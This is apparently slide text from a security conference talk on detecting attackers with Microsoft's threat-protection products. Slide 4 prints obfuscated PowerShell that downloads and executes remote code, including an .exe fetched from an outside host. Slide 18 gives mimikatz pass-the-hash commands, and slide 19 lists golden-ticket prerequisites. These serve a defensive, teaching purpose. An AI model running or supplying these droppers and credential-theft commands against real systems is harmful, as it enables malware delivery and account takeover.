Cyber Security & Defense is the emerging topic of the IT industry these days. A secure environment is no longer just a well-maintained firewall or a well-managed network. Rather, it is made up of several layers. However, most companies are „reactive“ instead of „proactive“, or neither, when it comes to securing their IT environments and detecting security breaches. In addition to this, the product portfolio and the security market is changing rapidly, and these changes make our jobs as IT Professionals significantly more difficult. But how can we deal with this challenge? In my session I will take a look into supposed “obvious“ security threats and how the Microsoft Cyber security stack can help to detect attackers and threats that have evaded our defenses.

1. The new era of endpoint security
Alexander Benoit
Microsoft MVP Enterprise Security | Certified Ethical Hacker
@ITPirate

2. Alex Benoit
Lead Security Analyst
Modern Secure Workplace
Microsoft Threat Protection
Alexander.Benoit@sepago.de
@ITPirate | @TrustInTechCGN | @GeekZeugs
https://it-pirate.com/

3. Microsoft Threat Protection

4. Obfuscation
((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}.” `I`N`V`o`k`e`C`o`m`m`A`N`D”).”
`N`e`w`S`c`R`i`p`T`B`l`o`c`k”((&(`G`C`M *w=O*)” `N`e`t`. `W`e`B`C`l`i`e`N`T”).”
`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘ht’+’tps://bit.ly/XYZ’)))
$nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object')
System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = '
http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC =
$env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in
$ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-
Item')($SDC);break;}catch{}

7. protect your data
Sandboxing
and detonation
• anonymous links
• companywide sharing
• explicit sharing
• guest user activity
collaboration signals
• malware in email + SPO
• Windows Defender
• Windows Defender ATP
• suspicious logins
• risky IP addresses
• irregular file activity
threat feeds
• users
• IPs
• On-demand patterns
(e.g. WannaCry)
activity watch lists
Leverage Signals
Apply Smart Heuristics
Files in SPO, ODB
and Teams
1st and 3rd
party reputation
Multiple AV
engines
SharePoint OneDrive Microsoft Teams

8. protect your data

9. ******
Require
MFA
Allow
access
Deny
access
Force
password
reset
Limit
access
Controls
Users
Devices
Location
Apps
Conditions
Machine
learning
Policies
Real time
Evaluation
Engine
3
10TB
Effective
policy
Session
Risk
conditional access

10. conditional access

11. conditional access

12. conditional access

13. conditional access

14. conditional access

15. conditional access

16. conditional access

17. conditional access

18. pass-the-hash
1. mimikatz
2. privilege::debug
3. sekurlsa::logonpasswords
4. sekurlsa::pth /user:Captain
/ntlm:6f0bafeef436381c8d38d106c767f6c8
/domain:itpirate.local

19. pass-the-ticket
1. krbtgt user’s NTLM hash (e.g. from a previous NTDS.DIT dump)
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate

20. pass-the-ticket
1. krbtgt user’s NTLM hash
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate

21. pass-the-ticket
1. krbtgt user’s NTLM hash
2. Domain name
3. Domain’s SID
4. Username that we’d like to impersonate

22. pass-the-ticket

23. pass-the-ticket

24. pass-the-ticket

25. pass-the-ticket

26. protect your admin identity

27. protection against identity theft
Abnormalresourceaccess
Account enumeration
Net Sessionenumeration
DNS enumeration
SAM-R Enumeration
Abnormalworking hours
Brute force using NTLM, Kerberos, or LDAP
Sensitiveaccountsexposed in plain text
authentication
Serviceaccountsexposed in plaintext
authentication
Honey Tokenaccountsuspicious activities
Unusualprotocol implementation
MaliciousDataProtectionPrivateInformation
(DPAPI) Request
AbnormalVPN
Abnormalauthenticationrequests
Abnormalresourceaccess
Pass-the-Ticket
Pass-the-Hash
Overpass-the-Hash
Maliciousservicecreation
MS14-068exploit
(Forged PAC)
MS11-013exploit (Silver
PAC)
Skeletonkey malware
Goldenticket
Remoteexecution
Maliciousreplicationrequests
AbnormalModificationof
SensitiveGroups
Reconnaissance
!
!
!
Compromised
Credential
Lateral
Movement
Privilege
Escalation
Domain
Dominance

28. protection against cloud threats
Malicious Insider
Protect against disgruntled
employees before they cause
damage
Ransomware
Identify ransomware using sophisticated
behavioral analytics technology
Rogue Application
Identify rouge applications that
access your data
Compromised Accounts
Combat advanced attackers that
leverage compromise user credentials
Malware
Detect malware in cloud storage
as soon as it’s uploaded
Data exfiltration
Detect unusual flow of data outside
of your organization

29. detection across cloud apps
Unusualfile shareactivity
Unusualfile download
Unusualfile deletionactivity
Ransomwareactivity
Data exfiltrationto unsanctionedapps
Activityby a terminatedemployee
Indicators of a
compromised session
Malicious use of
an end-user account
Threat delivery
and persistence
!
!
!
Malicious use of
a privileged user
Activityfrom suspicious IP addresses
Activityfrom anonymousIP addresses
Activityfrom an infrequentcountry
Impossible travelbetweensessions
Logon attempt from a suspicious user agent
Malwareimplantedin cloud apps
MaliciousOAuthapplication
Multiplefailed login attempts to app
Suspicious inbox rules (delete,forward)
Unusualimpersonatedactivity
Unusualadministrativeactivity
Unusualmultiple deleteVM activity

30. malware detection
• Scan cloud storage apps
• Identify potentially risky files

31. Thank You!
Gold Silver
Conference Partner